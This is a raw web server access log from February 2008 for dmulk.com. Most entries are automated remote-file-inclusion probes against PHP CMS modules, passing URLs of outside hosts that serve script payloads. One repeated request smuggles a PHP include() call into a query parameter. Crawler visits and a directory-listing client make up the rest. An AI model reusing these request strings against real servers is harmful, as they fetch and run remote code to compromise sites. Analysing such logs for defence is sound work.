217.149.115.250 - - [04/Feb/2008:05:50:00 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.93.36.240 - - [04/Feb/2008:05:50:29 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.79.168.42 - - [04/Feb/2008:05:50:48 -0800] "GET /logs/access_080108.log/config.php?path_to_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [04/Feb/2008:05:50:48 -0800] "GET /config.php?path_to_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.93.36.240 - - [04/Feb/2008:05:50:54 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.144.55.219 - - [04/Feb/2008:05:50:54 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [04/Feb/2008:05:50:55 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.192.68.176 - - [04/Feb/2008:05:51:55 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.192.68.176 - - [04/Feb/2008:05:51:55 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.192.68.176 - - [04/Feb/2008:05:51:56 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:52:51 -0800] "GET /logs/access_080114.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:53:12 -0800] "GET /logs/access_080117.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.230.199.108 - - [04/Feb/2008:05:53:13 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gsltportal.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.108 - - [04/Feb/2008:05:53:13 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gsltportal.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.108 - - [04/Feb/2008:05:53:13 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gsltportal.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.10 - - [04/Feb/2008:05:54:12 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gsltportal.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [04/Feb/2008:05:54:12 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gsltportal.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.145.69 - - [04/Feb/2008:05:54:35 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.145.69 - - [04/Feb/2008:05:54:57 -0800] "GET /logs/access_080111.log//modules/TotalCalendar/about.php?inc_dir=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.145.69 - - [04/Feb/2008:05:54:57 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.145.69 - - [04/Feb/2008:05:54:57 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.177.187.23 - - [04/Feb/2008:05:55:35 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [04/Feb/2008:05:55:41 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [04/Feb/2008:05:55:41 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.218.159.157 - - [04/Feb/2008:05:56:00 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.218.159.157 - - [04/Feb/2008:05:56:01 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:05:57:19 -0800] "GET /logs/access_080118.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_pathhttp://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:05:57:20 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_pathhttp://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.222.164 - - [04/Feb/2008:05:57:20 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_pathhttp://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.38 - - [04/Feb/2008:05:57:51 -0800] "GET /bikes/dteel/EQ2/ HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:58:10 -0800] "GET /logs/access_080121.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:58:41 -0800] "GET /?N=http%3A%2F%2Fwww.alonsaunet.com%2Fwebmaster%2Fromi%2Fjirudog%2F HTTP/1.0" 200 2946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
209.160.72.103 - - [04/Feb/2008:05:58:42 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:58:44 -0800] "GET /?D=http%3A%2F%2Fwww.feliciano.de%2FWebgalerie%2Fbilder%2FItaly%2Fune%2Fyiwul%2F HTTP/1.0" 200 2946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
74.200.76.198 - - [04/Feb/2008:05:58:49 -0800] "GET /modules/wiwimod/spaw/spaw_script.js.php?spaw_root=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.200.76.198 - - [04/Feb/2008:05:58:49 -0800] "GET /logs/modules/wiwimod/spaw/spaw_script.js.php?spaw_root=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:58:51 -0800] "GET /?M=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F HTTP/1.0" 200 2946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:58:52 -0800] "GET /?M=http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fixu%2Fxotem%2F HTTP/1.0" 200 2946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:58:54 -0800] "GET /?S=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Faseje%2Fwocobo%2F HTTP/1.0" 200 2946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:58:55 -0800] "GET /?S=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F HTTP/1.0" 200 2946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:00 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
81.171.125.30 - - [04/Feb/2008:05:59:03 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:05 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
74.220.215.212 - - [04/Feb/2008:05:59:05 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.199.108 - - [04/Feb/2008:05:59:07 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gsltportal.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:10 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:11 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:12 -0800] "GET /drop/ HTTP/1.0" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:12 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:14 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:16 -0800] "GET /megumi/?M=A HTTP/1.0" 200 921 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:17 -0800] "GET /logs/access_070906.log HTTP/1.0" 200 32974 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:19 -0800] "GET /logs/access_070926.log HTTP/1.0" 200 34093 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:22 -0800] "GET /minamijewelry/?S=A HTTP/1.0" 200 2094 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:23 -0800] "GET /minamijewelry/moon.psd HTTP/1.0" 200 108656 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:31 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:31 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
217.13.86.10 - - [04/Feb/2008:05:59:33 -0800] "GET /logs/access_080111.log//modules/TotalCalendar/about.php?inc_dir=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [04/Feb/2008:05:59:33 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [04/Feb/2008:05:59:34 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:35 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:36 -0800] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:40 -0800] "GET /funny/?D=A HTTP/1.0" 200 792 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:59:40 -0800] "GET /logs/access_080120.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:40 -0800] "GET /mobileoffice/?D=D HTTP/1.0" 200 5008 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
75.125.193.66 - - [04/Feb/2008:05:59:42 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:45 -0800] "GET /mobileoffice/?M=D HTTP/1.0" 200 5008 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:46 -0800] "GET /megumi/?D=D HTTP/1.0" 200 921 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:47 -0800] "GET /minamijewelry/?N=A HTTP/1.0" 200 2094 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
69.72.161.50 - - [04/Feb/2008:05:59:48 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:05:59:48 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:05:59:48 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:48 -0800] "GET /plans/?N=A HTTP/1.0" 200 958 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
69.72.161.50 - - [04/Feb/2008:05:59:50 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:51 -0800] "GET /funny/?N=A HTTP/1.0" 200 792 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
89.171.105.132 - - [04/Feb/2008:05:59:54 -0800] "GET /funny/?D=D HTTP/1.0" 200 792 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
80.177.187.23 - - [04/Feb/2008:05:59:54 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:00:23 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:00:23 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:00:23 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:00:24 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:00:24 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:00:24 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.132.54 - - [04/Feb/2008:06:01:08 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.27.33 - - [04/Feb/2008:06:01:19 -0800] "GET /tmp/?M=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:06:02:32 -0800] "GET /logs/access_080111.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:06:02:32 -0800] "GET /logs/access_080108.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:03:36 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [04/Feb/2008:06:03:36 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.192.68.176 - - [04/Feb/2008:06:03:37 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.234.1.78 - - [04/Feb/2008:06:04:14 -0800] "GET //inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
222.234.1.78 - - [04/Feb/2008:06:04:14 -0800] "GET /logs//inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:05:52 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:05:52 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:05:53 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:05:54 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:05:56 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:05:56 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:05:56 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.78.133 - - [04/Feb/2008:06:05:57 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:06:05:58 -0800] "GET /logs/access_080124.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:06:05:59 -0800] "GET /logs/access_080116.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.148.207.109 - - [04/Feb/2008:06:06:15 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.148.207.109 - - [04/Feb/2008:06:06:16 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:06:08:05 -0800] "GET /logs/access_080118.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.70.70.169 - - [04/Feb/2008:06:10:02 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://prevecamformacion.com/images/.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
